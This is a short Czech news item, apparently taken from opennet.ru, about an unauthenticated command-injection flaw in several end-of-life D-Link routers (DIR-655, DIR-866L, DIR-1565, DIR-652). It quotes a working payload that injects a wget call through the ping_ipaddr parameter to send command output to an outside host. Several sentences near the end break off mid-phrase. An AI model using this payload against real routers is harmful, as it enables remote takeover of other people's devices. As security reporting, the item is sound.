V bezdrátových směrovačích D-Link
Zajímavé je, že podle vývojářů firmwaru by mělo být volání „ping_test“ provedeno až po autentizaci, ale ve skutečnosti je voláno v každém případě bez ohledu na přihlášení do webového rozhraní. Zejména při přístupu ke skriptu apply_sec.cgi a předání parametru „action=ping_test“ se skript přesměruje na ověřovací stránku, ale současně provede akci spojenou s ping_test. Pro spuštění kódu byla použita další zranitelnost v samotném ping_test, která volá utilitu ping, aniž by řádně zkontrolovala správnost IP adresy odeslané k testování. Chcete-li například zavolat obslužný program wget a přenést výsledky příkazu „echo 1234“ do externího hostitele, stačí zadat parametr „ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Přítomnost chyby zabezpečení byla oficiálně potvrzena u následujících modelů:
- DIR-655 s firmwarem 3.02b05 nebo starším;
- DIR-866L s firmwarem 1.03b04 nebo starším;
- DIR-1565 s firmwarem 1.01 nebo starším;
- DIR-652 (neposkytují se žádné informace o problematických verzích firmwaru)
Doba podpory pro tyto modely již vypršela, takže D-Link
Později se zjistilo, že zranitelnost byla také
Zdroj: opennet.ru